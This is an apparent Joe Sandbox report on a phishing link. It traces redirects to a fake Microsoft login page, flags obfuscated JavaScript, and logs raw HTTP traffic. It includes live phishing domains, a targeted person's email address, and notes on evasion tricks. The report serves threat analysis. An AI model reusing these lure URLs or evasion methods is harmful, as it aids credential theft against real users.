Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t

Overview

General Information

Sample URL:https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t
Analysis ID:1588194
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish54
AI detected suspicious Javascript
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • chrome.exe (PID: 1400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1992,i,4909626885566366861,8010844917547904754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.9.id.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    0.21.i.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      3.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        4.9.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          4.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 1 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            Phishing

            barindex
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '1iugongna.com' does not match the legitimate domain 'microsoft.com'., The URL contains suspicious elements such as a numeric prefix and does not resemble any known Microsoft subdomains or services., The email domain 'seamaritima.com' in the input fields does not relate to Microsoft, which is unusual for a legitimate Microsoft page. DOM: 4.7.pages.csv
            Source: Yara matchFile source: 0.9.id.script.csv, type: HTML
            Source: Yara matchFile source: 0.21.i.script.csv, type: HTML
            Source: Yara matchFile source: 3.4.pages.csv, type: HTML
            Source: Yara matchFile source: 4.9.pages.csv, type: HTML
            Source: Yara matchFile source: 4.7.pages.csv, type: HTML
            Source: Yara matchFile source: 4.5.pages.csv, type: HTML
            Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFy... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and potential data exfiltration by modifying the document cookie. The script is also heavily obfuscated, making it difficult to analyze its true purpose. Overall, this script exhibits a high level of suspicion and should be considered a significant security risk.
            Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFy... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script from an unknown source, along with the obfuscated nature of the code, suggests this is a highly suspicious and potentially malicious script.
            Source: 0.19.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://1iugongna.com/?auth=2&qrc=recibase%40seama... The script demonstrates several high-risk behaviors, including redirecting the user to an unknown domain and potentially collecting sensitive data (session ID) without transparency. While the script may have a legitimate purpose, the lack of context and the use of obfuscation techniques raise significant security concerns.
            Source: 0.3.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFy... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()` and obfuscated code. It also sets a cookie with a long expiration date, which could be used for potential data exfiltration. The script appears to be testing for the presence of various headless browser and automation tools, suggesting it may have malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
            Source: 0.4.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://cocteldedeas.mx/rx567/#cmVjaWJhc2VAc2VhbWF... The script demonstrates several high-risk behaviors, including dynamic code execution (decoding and executing a Base64-encoded email parameter) and redirecting to a suspicious domain ('banirego.com'). While the intent may be to handle a legitimate email-based redirection, the use of obfuscation and interaction with an untrusted domain raises significant security concerns.
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Number of links: 0
            Source: https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tHTTP Parser: Base64 decoded: 1736541697.000000
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.comHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse2NsYXNzTGlzdDpbImIiXX
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: Iframe src: https://portal.microsoftonline.com/Prefetch/Prefetch.aspx
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: <input type="password" .../> found
            Source: https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tHTTP Parser: No favicon
            Source: https://banirego.com/?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.comHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No favicon
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No <meta name="author".. found
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49754 version: TLS 1.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: banirego.com to https://1iugongna.com/?dataxx0=eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9.eyj1cmwioijodhrwczovlzfpdwdvbmduys5jb20viiwizg9tywluijoimwl1z29uz25hlmnvbsisimtlesi6im1pekztn2x2atrjecisinfyyyi6injly2liyxnlqhnlyw1hcml0aw1hlmnvbsisimlhdci6mtcznju0mtcxniwizxhwijoxnzm2ntqxodm2fq.mg8kkqmk_b6jrb_klr2akwu0lymxu6gtw6en6s22wt4
            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49754 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /rx567 HTTP/1.1Host: cocteldedeas.mxConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rx567 HTTP/1.1Host: cocteldedeas.mxConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://cocteldedeas.mx/rx567Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: cocteldedeas.mxConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA
            Source: global trafficHTTP traffic detected: GET /rx567/ HTTP/1.1Host: cocteldedeas.mxConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE
            Source: global trafficHTTP traffic detected: GET /?uxkvuxjb&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t HTTP/1.1Host: banirego.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://cocteldedeas.mx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t HTTP/1.1Host: banirego.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cocteldedeas.mx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://banirego.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://banirego.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://banirego.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fff7d524c468c95&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8fff7d524c468c95&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: banirego.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://banirego.com/?uxkvuxjb=057408803a71a0ac4c22a04edd01551738a72ec043824bc1c0ccbb193634608407dbb3325f3c113b575f21696ea25abad7a5ce19d99eebf2f5c0709d8da49030&email=cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8fff7d524c468c95/1736541706063/t6T-xS85SQCUhhd HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
